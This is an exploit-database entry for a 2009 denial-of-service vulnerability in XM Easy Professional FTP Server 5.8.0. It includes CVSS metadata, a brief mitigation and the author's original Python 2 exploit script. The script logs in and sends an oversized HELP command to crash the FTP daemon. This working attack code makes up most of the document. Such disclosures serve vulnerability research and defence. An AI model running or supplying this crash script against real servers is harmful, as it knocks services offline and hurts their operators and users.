XM Easy Professional FTP Server 5.8.0 Denial Of Service Vulnerability

vendor:

XM Easy Professional FTP Server

by:

Mert SARICA

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: XM Easy Professional FTP Server

Affected Version From: 5.8.2000

Affected Version To: 5.8.2000

Patch Exists: NO

Related CWE: N/A

CPE: a:xm_easy_professional:xm_easy_professional_ftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2009

XM Easy Professional FTP Server 5.8.0 Denial Of Service Vulnerability

After successfuly logged-in, when you send 'HELP AAAA...(4074 times)', ftp daemon crashes.

Mitigation:

Ensure that the FTP server is configured to limit the number of commands that can be sent in a single request.

Source

Exploit-DB raw data:

# I discovered a denial-of-service vulnerability on XM Easy Professional
# FTP Server product.
# After successfuly logged-in, when you send "HELP AAAA...(4074 times)",
# ftp daemon crashes.

# -----------------------

# Exploit Title: XM Easy Professional FTP Server 5.8.0 Denial Of Service Vulnerability
# Date: 27.11.2009
# Author: Mert SARICA
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP SP3

# XM Easy Professional FTP Server 5.8.0
# Denial of Service Vulnerability
# Note: FTP account is required for exploitation
# http://www.mertsarica.com

from ftplib import *
import sys
import ftplib

try: 
    ftp = FTP('localhost')   # connect to host, default port
except:
    print "Connection error"
    sys.exit(1)
    
try:
    ftp.login()              # user anonymous, passwd anonymous@
except:
    print "Login failed"
    sys.exit(1)

packet = "HELP " + "MS" * 2037 # magic packet

try:
    ftp.sendcmd(packet)
    ftp.quit()
except ftplib.all_errors, error:
    print("Very good, young padawan, but you still have much to learn...")